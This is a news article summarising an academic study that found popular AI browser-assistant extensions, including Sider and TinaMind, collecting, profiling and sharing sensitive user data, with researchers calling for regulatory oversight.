A new study by researchers from University College London (UCL), UC Davis, and Mediterranea University of Reggio Calabria has exposed significant privacy risks posed by popular AI-powered browser assistants. The report, which analyzed a number of widely used generative AI extensions, found that many of these tools collect and transmit sensitive user data without clear consent or adequate safeguards, raising concerns among privacy advocates and regulatory bodies.
According to the study, some assistants were found to be particularly invasive, collecting a wide range of personal information, including financial details, health records, and even social security numbers. Researchers discovered that some assistants transmit full webpage content to their servers, meaning any information visible on the user’s screen could be captured. One notable finding was that some tools continued to track user activity even when in private browsing mode, a feature users often rely on to protect their privacy.
The investigation also revealed that the data collected is frequently used for user profiling. Assistants were found to infer attributes like age, gender, income, and interests from a user’s browsing habits and then use this information to personalize responses, often across different browsing sessions. Furthermore, some extensions, like Sider and TinaMind, were found to share user queries and identifiable information—such as IP addresses—with third-party analytics platforms, enabling cross-site tracking and targeted advertising.
Privacy experts warn that this data collection poses a serious threat to personal security. The information, once gathered, is vulnerable to data breaches and could be exploited for malicious purposes. The study’s authors are calling for urgent regulatory oversight, noting that some of the practices may already be in violation of privacy laws like the Health Insurance Portability and Accountability Act (HIPAA) and the Family Educational Rights and Privacy Act (FERPA) in the U.S. and likely fall short of the EU’s General Data Protection Regulation (GDPR).
The findings highlight a critical dilemma for consumers: the convenience offered by AI assistants often comes at the steep price of personal privacy. As these tools become more integrated into our daily digital lives, the need for transparency and stronger user control over personal data is more pressing than ever.